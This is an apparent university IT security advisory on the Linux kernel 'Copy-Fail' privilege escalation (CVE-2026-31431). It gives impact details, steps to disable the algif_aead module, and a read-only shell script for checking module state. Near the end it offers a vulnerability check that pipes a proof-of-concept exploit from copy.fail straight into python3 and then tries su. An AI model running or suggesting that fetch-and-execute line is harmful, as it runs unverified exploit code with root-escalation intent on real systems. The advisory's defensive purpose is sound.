
“Copy-Fail” vulnerability in the Linux kernel (CVE-2026-31431)

May 5, 2026

CVE-2026-31431, known as “Copy-Fail,” affects the Linux kernel and allows a local user to gain administrator (root) privileges. It is a privilege escalation vulnerability that can only be exploited by someone who already has access to the system.

 

Impact

The vulnerability has a CVSS score of approximately 7.8. It is not remotely exploitable, but it can be used in local attack scenarios.

The impact is greater on multi-user systems (shared servers, HPC environments), while it is limited on single-user personal machines.

Systems affected

 

macOS

Not affected

 

May be affected – see https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/96

  1. Update the Linux kernel to the correct version as soon as it becomes available.
  2. If updates are not available, apply a temporary mitigation by disabling the vulnerable module.
  3. Reboot the system after applying the mitigation. 

The algif_aead module can either be compiled directly into the kernel or loaded dynamically via modprobe, depending on the Linux distribution in use.

  • If the algif_aead module is loaded dynamically: disable it following the appropriate procedure for the specific distribution.
  • If the algif_aead module is built into the kernel: prevent it from initializing at boot by setting the kernel parameter:
    initcall_blacklist=algif_aead_init
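
A read-only way to tell which of the cases above applies to a host, as an added example that is not part of the original advisory. It reports whether algif_aead is currently loaded, built in (with or without the initcall_blacklist parameter active on the current boot), or not loaded. The function name, the state labels and the check for an `install` override in modprobe.d are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the advisory: read-only check of algif_aead state.
# Arguments override the system paths so it can be tried on constructed files.
algif_aead_state() {
    loaded_list=${1:-/proc/modules}
    builtin_list=${2:-/lib/modules/$(uname -r)/modules.builtin}
    cmdline=${3:-/proc/cmdline}
    confdir=${4:-/etc/modprobe.d}

    # Case 1: currently loaded as a dynamic module (first field of /proc/modules).
    if [ -r "$loaded_list" ] &&
        awk '$1 == "algif_aead" { f = 1 } END { exit !f }' "$loaded_list"; then
        echo loaded
        return
    fi

    # Case 2: built into the kernel image, so only the boot parameter helps.
    if [ -r "$builtin_list" ] &&
        grep -Eq '(^|/)algif_aead\.ko$' "$builtin_list"; then
        # initcall_blacklist takes a comma-separated list of function names.
        if [ -r "$cmdline" ] && tr ' ' '\n' < "$cmdline" |
            grep -Eq '^initcall_blacklist=([^,]*,)*algif_aead_init(,|$)'; then
            echo builtin-blacklisted
        else
            echo builtin-active
        fi
        return
    fi

    # Case 3: not loaded now. Assumption: the distribution's disable procedure
    # is an "install algif_aead ..." override in modprobe.d; without one the
    # module may still be loaded on demand if it is installed.
    if grep -Eqs '^[[:space:]]*install[[:space:]]+algif[_-]aead[[:space:]]' \
        "$confdir"/*.conf; then
        echo module-disabled
    else
        echo not-loaded
    fi
}

# Inspect the running system only when executed with the argument "run".
if [ "${1:-}" = "run" ]; then algif_aead_state; fi
```

The states `loaded`, `builtin-active` and `not-loaded` mean the mitigation is not in effect on the running kernel; `builtin-blacklisted` only appears after the reboot in step 3, because it is read from the current boot's command line.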

If the system is up to date or the mitigation has been correctly applied, the publicly available proof-of-concept should not allow privilege escalation.

To check, run:

curl https://copy.fail/exp | python3 && su && whoami

If no exceptions are generated and the returned username is “root”, then your system is vulnerable.

 

The Cybersecurity Service of the Politecnico has:

  • Informed the IT contacts of the departments
  • Provided technical guidance and support
  • Assisted in implementing countermeasures on critical infrastructures

In any case, it is always recommended to avoid executing unverified code from the Internet.

 

Who it is intended for

 

Faculty

 

Researchers and PhD students

 

Technical, administrative, and library staff